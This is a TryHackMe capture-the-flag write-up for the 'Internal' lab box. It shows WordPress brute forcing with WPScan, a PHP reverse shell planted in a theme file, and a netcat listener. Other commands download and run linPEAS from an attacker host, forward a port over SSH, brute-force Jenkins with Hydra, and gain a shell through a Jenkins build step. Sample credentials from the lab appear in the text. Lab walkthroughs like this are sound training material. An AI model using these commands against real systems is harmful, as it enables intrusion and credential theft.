Disclaimer -> All passwords and flags have been masked due rules to be a official TryHackMe writeup.
- Type: free
- Difficulty: Hard
- Mode: Unguided Capture the Flag (user.txt / root.txt)
- Covered topics / techniques / tools
- Abusing Jenkins Build Process
- Hydra Login Brute Force
- SSH Local Port Forwarding
- Tasks (jump right to the task)
URLs for this post
As always we check the full tcp scan first and the result is pretty managable.
So what do we have?
- Port 22 SSH
- Port 80 Web Server
Operating System: Ubuntu Linux
Software: Apache 2.4.29; OpenSSH 7.6p1
As there´s a web server the gobuster logfile is worth to take a look at.
On the Index.html the webserver shows the default web page of Apache. On /blog we get a generic wordpress page. With that in our mind we can use a nice tool to pull out more information out of wordpress sites.
WPScan allows us to automatically enumerate the wordpress instance by checking all posts for usernames, plugins, themes and many more.
wpscan --url http://internal.thm/blog -e
With a username we have the mission to get a password for it. Luckily WPScan comes with a brute force feature. By providing a wordlist we can let it run with the following command.
wpscan --url http://internal.thm/blog -U admin -P /usr/share/wordlists/rockyou.txt
Time to log in and check out any interesting posts and where we can put our file for a reverse shell!
The plugins were write protected and i had to take a look at the themes editor. At the running theme we can edit i.e. the file 404.php and plant our code in the there. Source of PHP Code
Reverse Shell Blog
Make sure that you put in your IP and a desired port for the listener.
Instantly start out listener and visit the page in the browser or via curl.
nc -nlvp 4444
Best practice is to stabilze our shell with python.
#remote python3 -c 'import pty; pty.spawn("/bin/bash")' CTRL^Z to put it in the background #local stty raw -echo; fg #remote echo TERM=xterm reset
Now we have auto completion and will not losing our shell by hitting CRTL^C. Because things are going so well we start our local http-server and upload linPEAS for local enumeration and possible privilege escalation vectors. Start the web server in the directory where the files stored which you want to share. Download the script, make ich executable und pipe the output in a log file. So you can take a look at it afterwards.
less -r will show you the colored output.
#local sudo python3 -m http.server 80 #remote wget http://attackerIP/linpeas.sh chmod +x linpeas.sh ./linpeas.sh | tee linpeas.log
Snippets of linpeas.log
/var/www/html/wordpress/wp-config.php define( 'DB_NAME', 'wordpress' ); define( 'DB_USER', 'wordpress' ); define( 'DB_PASSWORD', 'wordpress123' ); define( 'DB_HOST', 'localhost' ); [+] Searching passwords in config PHP files $pwd = trim( wp_unslash( $_POST['pwd'] ) ); $dbpass='B2Ud4fEOZmVq'; $dbuser='phpmyadmin';
Unfortunately these credentials won´t help us but as this is a penetration test we put that in our notes. What esle we can write down is that there is another local user on that box.
cat /etc/passwd shows us
After i while i found a text file in /opt
www-data@internal:/opt$ cat wp-save.txt
Bill, Aubreanna needed these credentials for something later. Let her know you have them and where they are. aubreanna:[CONFIDENTIAL]
It seems that we found a pair of credentials and we´ll use them instantly with ssh.
Now grad that user flag and check out the rest of the home directory.
The jenkins.txt tells us “Internal Jenkins service is running on 172.17.0.2:8080” and we can confirm that with the command
At this point we have to forward the port 8080 from that machine to us with
ssh email@example.com -L 8080:localhost:8080
Now we can access the service on out attacking machine via http://localhost:8080
Ok, no credentials that we found work. The default username of a jenkins installation is “admin”. So lets capture a login request with burp suite and fire up hydra with the correct http parameters
hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 8080 127.0.0.1 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password" -V -f
Reverse Shell Docker
After loggin in we can build a new project (Freestyle Project) and plant our command for a reverse shell in the build process.
As usual we start our listener nc -nlvp 4444 before we hit the “Build Now”-Button.
This part will be a quick one. No Kernel exploit, no sudo misconfiguration or other unpatched binaries. Just a note with credentials what´s still a thing “in the wild”.
jenkins@jenkins:/opt$ cat note.txt
Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you
need access to the root user account.